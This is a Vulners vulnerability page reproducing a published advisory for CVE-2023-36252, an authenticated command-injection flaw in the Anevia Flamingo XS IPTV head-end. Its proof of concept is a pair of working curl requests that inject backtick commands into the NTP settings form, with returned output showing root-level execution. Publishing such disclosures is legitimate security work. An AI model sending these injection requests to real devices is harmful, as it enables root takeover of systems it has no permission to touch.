Vulners
Lucene search
Anevia Flamingo XS 3.6.5 Authenticated Root Remote Code Execution
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2023-36252 | 26 Jun 202319:15 | – | attackerkb |
 | Ateme Flamingo XL 安全漏洞 | 26 Jun 202300:00 | – | cnnvd |
 | CVE-2023-36252 | 26 Jun 202300:00 | – | cve |
 | CVE-2023-36252 | 26 Jun 202300:00 | – | cvelist |
 | EUVD-2023-40226 | 3 Oct 202520:07 | – | euvd |
 | CVE-2023-36252 | 26 Jun 202319:15 | – | nvd |
 | CVE-2023-36252 | 26 Jun 202319:15 | – | osv |
 | Session fixation | 26 Jun 202319:15 | – | prion |
 | PT-2023-25496 · Ateme · Ateme Flamingo Xl | 26 Jun 202300:00 | – | ptsecurity |
 | CVE-2023-36252 | 23 May 202504:00 | – | redhatcve |
10
<html><body><p>Anevia Flamingo XS 3.6.5 Authenticated Root Remote Code Execution
Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.6.5
Hardware revision: 1.1
SoapLive 2.4.0
SoapSystem 1.3.1
Summary: Flamingo XL, a new modular and high-density IPTV head-end
product for hospitality and corporate markets. Flamingo XL captures
live TV and radio content from satellite, cable, digital terrestrial
and analog sources before streaming it over IP networks to STBs, PCs
or other IP-connected devices. The Flamingo XL is based upon a modular
4U rack hardware platform that allows hospitality and corporate video
service providers to deliver a mix of channels from various sources
over internal IP networks.
Desc: The affected device suffers from authenticated remote code
execution vulnerability. A remote attacker can exploit this issue
and execute arbitrary system commands granting her system access
with root privileges.
Tested on: GNU/Linux 3.14.29 (x86_64)
Apache/2.2.22 (Debian)
PHP/5.6.0-0anevia2
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5778
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php
13.04.2023
--
$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp" |findstr www-data
</p><td>uid=33(www-data)</td>
<input name="ntp_hosts[]" type="hidden" value="uid=33(www-data)"/>
<td>gid=33(www-data)</td>
<input name="ntp_hosts[]" type="hidden" value="gid=33(www-data)"/>
<td>groups=33(www-data),6(disk),25(floppy)</td>
<input name="ntp_hosts[]" type="hidden" value="groups=33(www-data),6(disk),25(floppy)"/>
---
$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp" |findstr root
<td>uid=0(root)</td>
<input name="ntp_hosts[]" type="hidden" value="uid=0(root)"/>
<td>gid=0(root)</td>
<input name="ntp_hosts[]" type="hidden" value="gid=0(root)"/>
<td>groups=0(root)</td>
<input name="ntp_hosts[]" type="hidden" value="groups=0(root)"/>
</body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Jun 2023 00:00Current
8High risk
Vulners AI Score8
CVSS 3.18.8
EPSS0.01642
SSVC